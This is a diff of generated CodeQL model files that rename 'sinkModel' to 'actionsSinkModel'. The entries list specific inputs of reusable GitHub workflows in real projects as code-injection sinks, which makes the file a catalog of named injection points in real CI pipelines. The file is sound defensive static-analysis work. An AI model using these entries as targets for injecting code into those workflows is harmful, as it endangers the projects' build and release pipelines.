extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 34efc8414d8..8c0c944a393 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 71866026ef9..8f4c4432408 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 83d241d21c0..9406f7d299c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 3021de12568..36838ef4ddb 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index d2cb1da1e9f..8b16601e6c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c551a135a14..e8db2ff568d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index f469f5de268..208e444adeb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 7ec8dac3f7b..41edf0b0373 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 4ce9252ce76..faca7973f1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index abb5b43c327..76db6821c5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 9e9da70e88e..383a88ed055 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 8de3f4c1ca4..bcd3b09ed68 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 5ec8c096934..53e16f8771a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index af9582282d0..4310e028de1 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 61bbb9d5372..84d2f57a3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index fdb440a742f..7debf6960ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index efd05d69abe..640180b870a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 9be191425ff..7ea3039b552 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 65a14c7cfaa..ced66aee32f 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 2c031ea9dc6..e63440d1fca 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index b90aacee9ca..f7021148c51 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 56823f4e1ac..8345368057c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 0f2937f9d14..3754ebfa63d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index a88c74f8537..3e35747b558 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index b7dfd8fcc9b..a13f6863caa 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 9de8130a93e..af5c300ea8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ea4980b8cd7..449ea8b7b49 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 8787c7e32c9..6656d42c4e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index ea55d53c215..6e7fdc34a54 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index add2fe0d2e2..8fc02a27e1c 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 400cd50b59f..80f19676b4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 42122b5ee22..56b2ef6691e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index c694d3953f6..7bc952a8483 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 9ecf401cab5..1c0663dd01c 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 19fee627702..4da8f327662 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4eb201001e1..4e8adfafe3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 94c7292b655..28cb702ce13 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 6088ffcd702..cb315ee4328 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 05c4dc8ddf3..956c4cba966 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index affc12cdc4a..804c1bdae4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index b1c4d2f2cbf..78d91b2afb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 4ccbd71f8c3..31cadc3ff17 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 2eb2104b542..11362fda1e5 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index fee95860030..131cff3e92a 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] 